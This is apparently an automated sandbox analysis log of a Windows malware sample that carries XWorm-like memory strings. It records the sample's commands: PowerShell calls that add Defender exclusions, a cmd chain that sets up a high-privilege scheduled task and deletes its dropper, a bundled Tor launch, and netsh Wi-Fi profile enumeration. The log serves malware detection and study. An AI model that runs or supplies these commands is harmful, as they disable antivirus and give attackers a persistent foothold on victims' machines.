Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"

Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-cq
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\cq@\cq'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0Tecq
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0TecqxF

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
